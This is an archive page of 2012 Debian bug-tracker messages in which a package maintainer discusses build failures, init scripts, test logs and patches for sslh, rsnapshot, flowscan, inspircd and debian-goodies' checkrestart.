Description: This is a digitally signed message part

Bug#678333: fails to terminate it's own testcode

2012-06-21 Thread Guillaume Delacour 
On Wed, Jun 20, 2012 at 11:48:32PM +0200, Andreas Barth wrote:
 Package: sslh
 Version: 1.13b-2
 Severity: serious
 
 
 Hi,

Hi,

 
 this packages fails to terminate it's testcode properly (at least on
 mipsel) and therefore requires the buildd to timeout the build (and
 wastes endless time):
 
 buildd   18416 1  0 21:27 ?00:00:00 sh -c ./echosrv --listen 
 ip6-localhost:9000 --prefix 'ssh: '
 buildd   18417 1  0 21:27 ?00:00:00 sh -c ./echosrv --listen 
 ip6-localhost:9001 --prefix 'ssl: '
 buildd   18419 18416  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9000 --prefix ssh:
 buildd   18420 18417  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9001 --prefix ssl:
 buildd   18421 18419  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9000 --prefix ssh:
 buildd   18422 18420  0 21:27 ?00:00:00 ./echosrv --listen 
 ip6-localhost 9001 --prefix ssl:
 
 Please make sure whatever happens that the testcode is terminated.

You're absolutely right; i didn't see that *ALL* buildd are waited the process
to be terminated (Build killed with signal TERM after 150 minutes of 
inactivity)

Upstream call killall echosrv in the testcode, but the package (psmisc) is
not essential, so not installed on buildd. I've reproduced the problem with
pbuilder and i'll just add a Build-Depends on psmisc in 1.13b-3.

 
 
 Andi
 
 

-- 
Guillaume Delacour


signature.asc
Description: Digital signature

Bug#660385: php5-imagick: ignores memory limit

2012-04-30 Thread Guillaume Delacour 
Hello,

The resource type RESOURCETYPE_MEMORY on php-imagick corresponds to
ImageMagick MAGICK_MEMORY_LIMIT, which define how much memory could be
use to reserve memory for tasks and when the limit is reached, cached
memory-mapped disk is used:

http://fr2.php.net/manual/en/imagick.setresourcelimit.php
http://www.imagemagick.org/script/resources.php#environment

So whatever value you use in setResourceLimit for RESOURCETYPE_MEMORY,
the tasks are processed (less or more quickly).

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#650406: sslh: does not start automatically during Debian init process

2012-04-30 Thread Guillaume Delacour 
Hello,

Le mercredi 25 janvier 2012 à 00:07 +0100, Philippe Basinska a écrit :
 Le 22/01/2012 21:26, Guillaume Delacour a écrit :
  Hello,
 
  Le samedi 17 décembre 2011 à 21:34 +0100, Guillaume Delacour a écrit :
  Le mardi 29 novembre 2011 à 16:51 +0100, Philippe Basinska a écrit :
  Package: sslh
  Version: 1.6i-4
  Severity: normal
  Tags: patch
 
  Hello,
 
  I didn't tag the issue with 'squeeze' label since I can't test it right
  now on a testing system. However, init script of sslh seems different in
  version 1.9.
 
  Whatever, my stable sslh daemon does not start automatically with Debian
  Squeeze. The command `invoke-rc.d sslh start` is good enough to fix the
  issue until next reboot.
 
  Any news on this issue ? Is my explanation correct ?
 
 
 
 Hi Guillaume,
 
 I just rolled back my hack to try your solution.
 
 I mean that I removed the LSB tag to start sshd before sslh and I 
 updated the SysV init links. Then I added the option to log stuff in 
 /var/log/boot.
 
 Now, sslh starts during each boot. Even if I didn't change anything in 
 my network interface. I tried a few times to be sure but it works fine 
 and I got no relevant information in log (indeed, the sslh daemon 
 starts...).
 
 Starting ssl/ssh multiplexer : sslh
 SSL addr: 127.0.0.1:443 (after timeout 2s)
 SSH addr: 127.0.0.1:22
 listening on 192.168.2.1:443
 turning into sslh
 
 I assume the problem disappeared because I changed rc2.d links. 
 Actually, both ssh and sslh start much later so the network must be 
 available.
 
 server-bl:~# ls -l /etc/rc2.d/ | grep ssh\|sslh
 lrwxrwxrwx 1 root root  13 25 janv. 00:03 S22ssh - ../init.d/ssh
 lrwxrwxrwx 1 root root  14 24 janv. 23:58 S24sslh - ../init.d/sslh
 
 See you,
 

So i close this bugreport, feel free to reopen if you have other issues
about this.


-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386

2012-04-26 Thread Guillaume Delacour 
Hi,

Le mercredi 18 avril 2012 à 00:01 +0100, Jonathan Wiltshire a écrit :
 Source: inspircd
 Version: 2.0.5-1
 Severity: important 
 
 This is a lintian error:
 
 E: inspircd: depends-on-essential-package-without-using-version depends: hurd

As inspircd use libpthread, it seems to be a bug and will be fixed with
the next upload of eglibc that include libpthread (as #debian-hurd
folks).

 
 -- System Information:
 Debian Release: wheezy/sid
   APT prefers unstable
   APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 
 'experimental')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 3.2.0-2-amd64 (SMP w/2 CPU cores)
 Locale: LANG=en_GB.utf8, LC_CTYPE=en_GB.utf8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/bash
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660372: fix cmd_postexec - allow unmounting of snapshot root by cmd_postexec config option

2012-04-10 Thread Guillaume Delacour 
tags 660372 moreinfo
thanks

Hi,

Le samedi 18 février 2012 à 18:53 +0100, Mike Gabriel a écrit :
 Package: rsnapshot
 Version: 1.3.1-1
 Severity: normal
 Tags: squeeze
 
 With rsnapshot from lenny it was able to copy backups to a mounted USB hard 
 disk
 and unmount the USB disk after rsnapshot had finished. For the unmounting I 
 used
 the cmd_postexec configuration parameter.
 
 With rsnapshot from squeeze this is not possible anymore. rsnapshot complains 
 with
 ,,Device or resource busy'' (meaning: the USB disk cannot be unmounted because
 rsnapshot has its current working directory within the snapshot root 
 somewhere).
 
 With this issue report I would like to provide a patch (against rsnapshot in 
 squeeze)
 that might solve the problem. (,,might'' means here: the problem occurrs at a 
 customer's
 site where I cannot test the patch ATM, but it is very likely that the patch 
 fixes the
 reported issue).

I'm not sure the problem are cmd_{pre,post}exec commands, the following
tests work well in a squeeze chroot test environment (i only use
rsnapshot to backup to local storage):

 fake usb device disk with ext3 fs mounted on loopback

$ dd if=/dev/zero of=/tmp/usb_fake_disk bs=1M count=128
$ sudo mkfs -t ext3 /tmp/usb_fake_disk
$ sudo mount -o loop /tmp/usb_fake_disk /mnt/  ls /mnt \
   sudo umount /mnt/

 minimal rsnapshot.conf

$ egrep -v '^($|#)' /etc/rsnapshot.conf 
config_version  1.2
snapshot_root   /mnt/
cmd_rm  /bin/rm
cmd_rsync   /usr/bin/rsync
cmd_logger  /usr/bin/logger
cmd_preexec /bin/mount -o loop /tmp/usb_fake_disk /mnt/
cmd_postexec/bin/umount /mnt/
intervalhourly  6
intervaldaily   7
intervalweekly  4
verbose 2
loglevel3
lockfile/var/run/rsnapshot.pid
backup  /etc/   localhost/

 launch a job to validate

$ sudo rsnapshot -v hourly
echo 19163  /var/run/rsnapshot.pid 
/bin/mount -o loop /tmp/usb_fake_disk /mnt/ 
mkdir -m 0755 -p /mnt/hourly.0/ 
/usr/bin/rsync -a --delete --numeric-ids --relative
--delete-excluded /etc \
/mnt/hourly.0/localhost/ 
touch /mnt/hourly.0/ 
/bin/umount /mnt/ 
rm -f /var/run/rsnapshot.pid 

$ sudo mount -o loop /tmp/usb_fake_disk /mnt/ \
   ls /mnt/hourly.0/localhost/
etc


Can you check the issue by running the rsnapshot cron jobs with the -v
flag and redirect stderr to a logfile to verify that the problem is not
the usb disk itself (to long to umount, etc.) or its usage (use lsof or
fuser to verify that no other task use the mountpoint, etc.) ?

It would be great to have information about this issue, to definitively
eliminate or not cmd_{pre,post}exec behavior (and maybe great to
validate your patch too).

Thanks.

 
 The patch will be send with a follow-up mail.
 
 -- System Information:
 Debian Release: 6.0.4
   APT prefers stable
   APT policy: (500, 'stable')
 Architecture: amd64 (x86_64)
 
 Kernel: Linux 2.6.32-5-amd64 (SMP w/4 CPU cores)
 Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
 Shell: /bin/sh linked to /bin/dash
 
 Versions of packages rsnapshot depends on:
 ii  liblchown-perl 1.01-1Perl interface to the lchown() 
 sys
 ii  logrotate  3.7.8-6   Log rotation utility
 ii  perl   5.10.1-17squeeze3 Larry Wall's Practical 
 Extraction 
 ii  rsync  3.0.7-2   fast remote file copy program 
 (lik
 
 Versions of packages rsnapshot recommends:
 ii  openssh-client1:5.5p1-6+squeeze1 secure shell (SSH) client, for 
 sec
 
 rsnapshot suggests no packages.
 
 -- no debconf information
 
 
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#665260: sslh: FTBFS: Can't exec lcov: No such file or directory at ./t line 298.

2012-03-22 Thread Guillaume Delacour 
  listening on:
  localhost:9002
  localhost:9002
  timeout to ssh: 2
  listening to 2 addresses
  localhost:9002:bind: Address already in use
  exited with 1
  #   Failed test 'Exit status if can't open PID file'
  #   at ./t line 265.
  #  got: '1'
  # expected: '3'
  not ok 25 - Exit status if can't open PID file

I think this is the same problem here.

  ***Test: Can't bind address
  spawned 19256
  ssh addr: localhost:9000. libwrap service: sshd family 10 10
  ssl addr: localhost:9001. libwrap service: (null) family 10 10
  listening on:
  fx-in-f106.1e100.net:9000
  timeout to ssh: 2
  listening to 1 addresses
  fx-in-f106.1e100.net:9000:bind: Cannot assign requested address
  exited with 1
  ok 26 - Exit status if can't bind address
  ***Test: Can't resolve address
  spawned 19257
  Name or service not known `blahblah.dontexist'
  exited with 4
  ok 27 - Exit status if can't resolve address
  Can't exec lcov: No such file or directory at ./t line 298.
  Can't exec genhtml: No such file or directory at ./t line 299.
  Can't exec killall: No such file or directory at ./t line 301.
  # Looks like you failed 2 tests of 27.

The problem is just here; the upstream test suite fails on 2 tests, see
above.

  1..27
  make[1]: *** [test] Error 2
 
 The full build log is available from:
http://people.debian.org/~lucas/logs/2012/03/21/sslh_1.10-3.log
 
 A list of current common problems and possible solutions is available at 
 http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!
 
 About the archive rebuild: The rebuild was done on about 50 AMD64 nodes
 of the Grid'5000 platform, using a clean chroot.  Internet was not
 accessible from the build systems.
 
 

[1]: http://bugs.debian.org/660269

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-21 Thread Guillaume Delacour 
Le mardi 20 mars 2012 à 21:58 +0100, Guillaume Delacour a écrit :
 Le mercredi 07 mars 2012 à 02:33 +0100, Guillaume Delacour a écrit :
  
  I'm afraid, there is another problem with fano and field schroots:
  127.0.0.1 appears to point twice to localhost, so sslh try to listen
  twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
  I've ping christoph on irc to know if it is possible to fix /etc/hosts
  on these box, otherwise i'll refresh the patch i've made to bind to
  127.0.0.1 and not localhost.
  
  --
  Guillaume Delacour g...@iroqwa.org
 
 The 1.10-3 version does not completely fix the problem: there is yet
 others issue with localhost entries in /etc/hosts on buildd:
 
 ***Test: Changing to non-existant username
 spawned 21450
 ssh addr: localhost:9000. libwrap service: sshd family 28 28
 ssl addr: localhost:9001. libwrap service: (null) family 28 28
 listening on:
   localhost:9002
   localhost:9002
 timeout to ssh: 2
 listening to 2 addresses
 localhost:9002:bind: Address already in use
 exited with 1
 not ok 24 - Exit status on non-existant username
 #   Failed test 'Exit status on non-existant username'
 #   at ./t line 249.
 #  got: '1'
 # expected: '2'
 ***Test: Can't open PID file
 spawned 21451
 ssh addr: localhost:9000. libwrap service: sshd family 28 28
 ssl addr: localhost:9001. libwrap service: (null) family 28 28
 listening on:
   localhost:9002
   localhost:9002
 timeout to ssh: 2
 listening to 2 addresses
 localhost:9002:bind: Address already in use
 exited with 1
 not ok 25 - Exit status if can't open PID file
 #   Failed test 'Exit status if can't open PID file'
 #   at ./t line 265.
 #  got: '1'
 # expected: '3'
 ***Test: Can't bind address
 
 I've contacted a kfreebsd build admin who should make some changes
 in /etc/hosts in schroot to fix all these issues.
 

Thanks to christoph, sslh now build kfreebsd-*.
I can really close this bug.


-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-20 Thread Guillaume Delacour 
Le mercredi 07 mars 2012 à 02:33 +0100, Guillaume Delacour a écrit :
 
 I'm afraid, there is another problem with fano and field schroots:
 127.0.0.1 appears to point twice to localhost, so sslh try to listen
 twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
 I've ping christoph on irc to know if it is possible to fix /etc/hosts
 on these box, otherwise i'll refresh the patch i've made to bind to
 127.0.0.1 and not localhost.
 
 --
 Guillaume Delacour g...@iroqwa.org

The 1.10-3 version does not completely fix the problem: there is yet
others issue with localhost entries in /etc/hosts on buildd:

***Test: Changing to non-existant username
spawned 21450
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on:
localhost:9002
localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 24 - Exit status on non-existant username
#   Failed test 'Exit status on non-existant username'
#   at ./t line 249.
#  got: '1'
# expected: '2'
***Test: Can't open PID file
spawned 21451
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on:
localhost:9002
localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 25 - Exit status if can't open PID file
#   Failed test 'Exit status if can't open PID file'
#   at ./t line 265.
#  got: '1'
# expected: '3'
***Test: Can't bind address

I've contacted a kfreebsd build admin who should make some changes
in /etc/hosts in schroot to fix all these issues.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-03-06 Thread Guillaume Delacour 
Hi,

Le jeudi 23 février 2012 à 22:46 +0100, Guillaume Delacour a écrit :
 It seems to be a problem in both buildd kfreebsd hosts fano and field:
 the ip6-localhost entry point to 127.0.0.1 (with correct entries, on
 fresh install of debian/kfreebsd for example, the problem does not
 appear).
 
 As a workaround, i can patch upstream test suite to force to bind IPv6
 loopback ::1 instead of ip6-localhost.
 

I'm afraid, there is another problem with fano and field schroots:
127.0.0.1 appears to point twice to localhost, so sslh try to listen
twice to localhost (--listen 127.0.0.1:$sslh_port in t test file).
I've ping christoph on irc to know if it is possible to fix /etc/hosts
on these box, otherwise i'll refresh the patch i've made to bind to
127.0.0.1 and not localhost.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#635065: RFP: whatweb -- Next generation web scanner' from 'ITP: whatweb -- Next generation web scanner

2012-03-05 Thread Guillaume Delacour 
I don't think i have the time to maintain another package (which is ruby
written, so that i don't really know), but i think it could be
interesting to introduce it to Debian; please find attached the work
i've started a few months ago, if it could be maybe reusable by the
future maintainer.

-- 
Guillaume Delacour g...@iroqwa.org


whatweb_0.4.7-1.debian.tar.gz
Description: application/compressed-tar


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#620960: RFS: inspircd

2012-03-04 Thread Guillaume Delacour 
Le samedi 03 mars 2012 à 14:53 +0100, Helmut Grohne a écrit :
 On Wed, Dec 14, 2011 at 10:25:37PM +0100, Guillaume Delacour wrote:
  Le samedi 03 décembre 2011 à 11:39 +0100, Jan Lübbe a écrit :
   On Tue, 2011-11-01 at 22:00 +0100, Guillaume Delacour wrote: 
To access further information about this package, please visit the 
following URL:

  http://mentors.debian.net/package/inspircd

Alternatively, one can download the package with dget using this 
command:

  dget -x 
http://mentors.debian.net/debian/pool/main/i/inspircd/inspircd_2.0.5-1.dsc
   
   It seems you've replaced that package with a new one on 2011-11-30. Did
   you want to that one uploaded, too?
  
  Yes, the package on mentors (2011-11-30) is the package i want to upload
  in the archive (i've forgot to include some stuff a few days ago and
  regenerate/reupload it on mentors).
 
 Since the mentors migrated to debexpo your package is 404. Can you
 reupload? Additionally I suggest that you also report a bug against
 sponsorship-requests with severity important, as your upload fixes and
 rc bug.

I just reuploaded the package as it was removed from mentors the 25 of
february.

 
 Helmut

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660044: flowscan: diff for NMU version 1.006-13.1

2012-03-02 Thread Guillaume Delacour 
Le mardi 28 février 2012 à 00:53 +0100, Leo Iannacone a écrit :
 tags 660044 + patch
 tags 660044 + pending
 thanks
 
 Dear maintainer,
 
 I've prepared an NMU for flowscan (versioned as 1.006-13.1) and
 uploaded it to DELAYED/3. Please feel free to tell me if I
 should delay it longer.

Hello,

I acknowledge this, i've seen your message too late to find a sponsor
for fixing the bug.

I tried a while to work on a new version of the package which integrate
direct upstream changes (and these modifications are made by the
previous maintainer) into quilt patches, but never finalize it.

 
 Regards.
 reverted:
 --- flowscan-1.006/configure.in
 +++ flowscan-1.006.orig/configure.in
 @@ -135,13 +135,13 @@
  
  dnl Checks for misc.
  
 +AC_MSG_CHECKING(that service name for 80/tcp is http)
 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, 
 tcp)? 0 : 1)'
 -AC_MSG_CHECKING(that service name for 80/tcp is www)
 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, 
 tcp)? 0 : 1)'
  then
 AC_MSG_RESULT(yes)
  else
 AC_MSG_RESULT(no)
 +   AC_MSG_ERROR(Please change /etc/services so that the service name for 
 80/tcp is http with alias www, www-http)
 -   AC_MSG_ERROR(Please change /etc/services so that the service name for 
 80/tcp is www with alias http, www-http)
  fi
  
  AC_OUTPUT(Makefile flowscan graphs.mf example/crontab util/locker 
 util/add_ds.pl util/add_txrx util/event2vrule util/ip2hostname)
 reverted:
 --- flowscan-1.006/configure
 +++ flowscan-1.006.orig/configure
 @@ -1296,14 +1296,14 @@
  
 
 
 +echo $ac_n checking that service name for 80/tcp is http... $ac_c 16
 +echo configure:1301: checking that service name for 80/tcp is http 5
 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, 
 tcp)? 0 : 1)'
 -echo $ac_n checking that service name for 80/tcp is www... $ac_c 16
 -echo configure:1301: checking that service name for 80/tcp is www 5
 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, 
 tcp)? 0 : 1)'
  then
 echo $ac_tyes 16
  else
 echo $ac_tno 16
 +   { echo configure: error: Please change /etc/services so that the service 
 name for 80/tcp is http with alias www 12; exit 1; }
 -   { echo configure: error: Please change /etc/services so that the service 
 name for 80/tcp is www with alias http 12; exit 1; }
  fi
  
  trap '' 1 2 15
 diff -u flowscan-1.006/debian/changelog flowscan-1.006/debian/changelog
 --- flowscan-1.006/debian/changelog
 +++ flowscan-1.006/debian/changelog
 @@ -1,3 +1,11 @@
 +flowscan (1.006-13.1) unstable; urgency=low
 +
 +  * Non-maintainer upload.
 +  * Fix configure looking for http service instead of www
 +(Closes: 660044, LP: #935087). 
 +
 + -- Leo Iannacone l...@ubuntu.com  Tue, 28 Feb 2012 00:50:32 +0100
 +
  flowscan (1.006-13) unstable; urgency=low
  
* New maintainer (Closes: #402663).
 
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory

2012-02-23 Thread Guillaume Delacour 
Hi,

Le vendredi 17 février 2012 à 22:03 +0100, Luca Falavigna a écrit :
 Source: sslh
 Version: 1.10-1
 Severity: serious
 Justification: fails to build from source
 
 
 sslh fails to build from source on kfreebsd-*, but built in the past:
 
 Connection refused
 ***Test: big message
 Connection refused
 ***Test: Stalled connection
 Connection refused
 Connection refused
 cat: /tmp/sslh_test.pid: No such file or directory
 killing
 Can't kill a non-numeric process ID at ./t line 192.
 # Looks like your test exited with 1 before it could output anything.
 make[1]: *** [test] Error 1
 
 https://buildd.debian.org/status/fetch.php?pkg=sslharch=kfreebsd-amd64ver=1.10-1stamp=1328484132
 https://buildd.debian.org/status/fetch.php?pkg=sslharch=kfreebsd-i386ver=1.10-1stamp=1328499099
 
 
 

It seems to be a problem in both buildd kfreebsd hosts fano and field:
the ip6-localhost entry point to 127.0.0.1 (with correct entries, on
fresh install of debian/kfreebsd for example, the problem does not
appear).

As a workaround, i can patch upstream test suite to force to bind IPv6
loopback ::1 instead of ip6-localhost.

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#659420: flowscan: Uses perl4 corelibs without Depends

2012-02-13 Thread Guillaume Delacour 
Le vendredi 10 février 2012 à 23:44 +, Dominic Hargreaves a écrit :
 Package: flowscan
 Version: 1.006-13
 Severity: normal
 User: debian-p...@lists.debian.org
 Usertags: perl4-corelibs
 
 Dear maintainer,

Hello,

 
 This package currently uses one or more deprecated perl 4 era packages,
 as shown on the lintian report[1]:
 
 usr/bin/locker:7 getopts.pl
 
 As detailed at [2] we would like you to either add a dependency on
 
 libperl4-corelibs-perl | perl ( 5.12.3-7)
 
 or (ideally) to replace their use with more modern equivalents.
 We'd like to have this in place for wheezy, so that we can follow
 cleanly the upstream deprecation cycle in wheezy+1.
 
 If you prefer, I will NMU your package with the dependency added.

Go ahead, i lak time to update this package.
Thanks.

 
 The wiki page [2] has references (taken from the source of the libraries
 in question) for the recommended replacement libraries.
 
 Thanks,
 Dominic.
 
 [1] http://lintian.debian.org/tags/script-uses-perl4-libs-without-dep.html
 [2] 
 http://wiki.debian.org/Teams/DebianPerlGroup/OpenTasks/Transitions/Perl4CoreLibs
 

-- 
Guillaume Delacour g...@iroqwa.org


signature.asc
Description: Ceci est une partie de message numériquement signée

Bug#657087: checkrestart: Detect real command for interpreted languages

2012-01-23 Thread Guillaume Delacour 
Package: debian-goodies
Version: 0.59
Severity: wishlist
Tags: patch

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Hello,

Checkrestart is very useful for daemon written in C, but lacks to detect the
real command when the daemon is written in intrepreted languages.

(As an example) I propose the attached patch, which read /proc/pid/cmdline
just in the case of the executable command (/proc/pid/exe) is linked to an
interpreter (the regex is definitely not complete; i only test it for perl and
python daemons running on my boxes). With this, the command passed to
dpkg-search --search successfully find the initscript used to restart the
daemon.

- -- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.38-12-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages debian-goodies depends on:
ii  curl  7.23.1-3
ii  dctrl-tools [grep-dctrl]  2.20.1
ii  dialog1.1-20111020-1
ii  less  444-1
ii  perl  5.14.2-6
ii  python2.7.2-9
ii  whiptail  0.52.14-7

Versions of packages debian-goodies recommends:
ii  lsof  4.81.dfsg.1-1

Versions of packages debian-goodies suggests:
pn  popularity-contest  none
pn  xdg-utils   1.1.0~rc1+git20111210-5
pn  zenity  none

- -- no debconf information

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iQIbBAEBCAAGBQJPHeHTAAoJEJmGUYuaqqClg/0P92g6ECmxxdUxJhUp3btv7AHw
FfT28tA5zDp3X/ssWkEhwmywmUvPgvuANFvaZQZ8IWT9EJdsUzVEhUDhEbSVOaiN
GUAgBBlPrjEnKR9moLK70ReQAtC3jc5u/OTvfi43EvS0A2PQemqh+Z+IKYzeQScS
KhtwHCZyHOFYAUXr8qCMREtjl7bJy87skv4L+nyh10L2YvHN94cG2pCudvUe0IGa
tWXYylCgHDiiSlhoNGGF92VX6u65VLijKNrR0Vtlxbhdwp9PgIPTPA9IMewCkVxv
UYzBQk+z3T+J4J62HlfTa9KJwmAynybHMbq03SPeAENgBBsa6VsYWddV6AksvJwu
Fmh8crXG42h1U2gQFWvv8kyL1+N9+xud63azcCHs/UGoBoeTLNFdYIrltFvZ9xCw
mJ4YqIwvt9Z8Nd6mEn9ZtbYrXpSGly4RCNOu86vy8377sQMQd3IhFBfH6rsPAc09
5CH+Mp+IFMufWKdzYQq699aoaolDRjnFfYY6VY4kU8fboRWvKOeaEeofXxvLb8d3
nIlAzkBDFZJJIG4thLS6xK1GgiLN3qdbIRK0gAuAGD+ofiYkyTdpmkxT2jOg83gc
LDAEpkqavkIK7nz+duPwk6ZefwNePYvvRgEZFnfi+yjLR0LB9/QYiG9PIvlSHsTS
oxuhEoDECWBANv/DptQ=
=8pFT
-END PGP SIGNATURE-
--- /usr/sbin/checkrestart	2011-10-25 00:20:00.0 +0200
+++ /tmp/checkrestart	2012-01-23 22:59:43.052505207 +0100
@@ -426,6 +426,18 @@
 
 try:
 self.program = os.readlink('/proc/%d/exe' % self.pid)
+# if the executable command is an interpreter such as perl/python,
+# we want to find the real program
+m = re.match(^/usr/bin/(perl|python)$, self.program)
+if m:
+with open('/proc/%d/cmdline' % self.pid, 'r') as cmdline:
+# only match program in /usr (ex.: /usr/sbin/smokeping)
+# ignore child, etc.
+m = re.search(r'^(([/]\w*){1,5})\s.*$', cmdline.read())
+if m:
+# store the real full path of script as the program
+self.program = m.group(1)
+
 except OSError, e:
 if e.errno != errno.ENOENT:
 raise

Bug#656891: RFP: bacula-gui -- Bweb is a Bacula web interface

2012-01-22 Thread Guillaume Delacour 
Package: wnpp
Severity: wishlist

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

* Package name: bacula-gui
  Version : 5.0.3
  Upstream Author : Kern Sibbald k...@sibbald.com
* URL : http://sourceforge.net/projects/bacula/
* License : GPL
  Programming Lang: Perl
  Description : Bweb is a Bacula web interface

bacula-gui contains bweb which is a web interface for managing bacula:
reporting, clients status, media management, restore (needs libjs-extjs), etc.
Upstream tarball contains an old debian/ directory which is maybe a good
way to start packaging bweb. Maybe more appropriate to name the package bweb.

At this time, bacula version 5.0.3 is in the archive and i think the version
of bweb needs to be the same (for compatibility and the catalog schema ?).

bacula-gui also contains brestore which is a Perl/Gtk console for restoring
files. The tool seems to be quite old and bat included in the bacula project
seems to be more powerfull.

Finally, the bacula-gui tarball also contains bacula-web, which is a reporting
only web tool written in PHP; the project was abandonned in the last few years
and has been revived in 2011 and distributed outside bacula-gui (so no need
to package it).

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)

iQIcBAEBCAAGBQJPHE2cAAoJEJmGUYuaqqCl6AMP/RrjVASNMNvV7t/0ANJ2tHuM
5su/ECFTt4gvdyGq/SwmJM1eF92tWTmIagalKbeaK4dun5Vx2khOXwb1faCaLw/h
i2/Gh4nXPzNNfr8m4WrcOOABjq/61KIu/lsfKIMSj0X7P8h5tpg10n2Pt+PIOjRc
72v04wguLeBk++wwNUZ0ZAvO64uEsBsQJfY3crQQwhlFvEEtcqIbn7P4cdicKbJ8
oCIC/vqPyPdG5IUhUGPAaoLSZikySngqU1iVnnT2HFo7Fk06mbRSkAmPXTX9ST0+
BE33eqKiayyWL3XpxoqdTAk2waDns845H2hy++Au69GCNybDOqbCiiwoC/Wo16nK
9AgZ91OyaeKfu2QnrdgVXDJXsgYdCN1w575sOqcok+Yv9P/THT++JBmMVlP3vjek
XK/L9MXnZmsUoN4qeyTSq2I4P9rpLmMn7TtuAgGLTgNeoFrT9yBSH9jN434HWuKN
75p0WmlTKpPVu/iVc9RMUqDrDUrrqDnZ011TABgcGFHIloMEfGMxNNz0BmhwKQ+k
y7mJ+YV+bqwD9Vo8poE8LzgVzK+6iE3QWy8apIu2H8zbZRGiQ3y+lFs4VrgopH5V
RuX+1a6OaP1BpAZH5IwB5gr+7Th+wMj/r+RTW5rHwtjCXA06q20VSBOnQQqkibzT
exY/SgKb0ZU9SNnS3R5F
=UCaU
-END PGP SIGNATURE-



-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

  1   2   3   >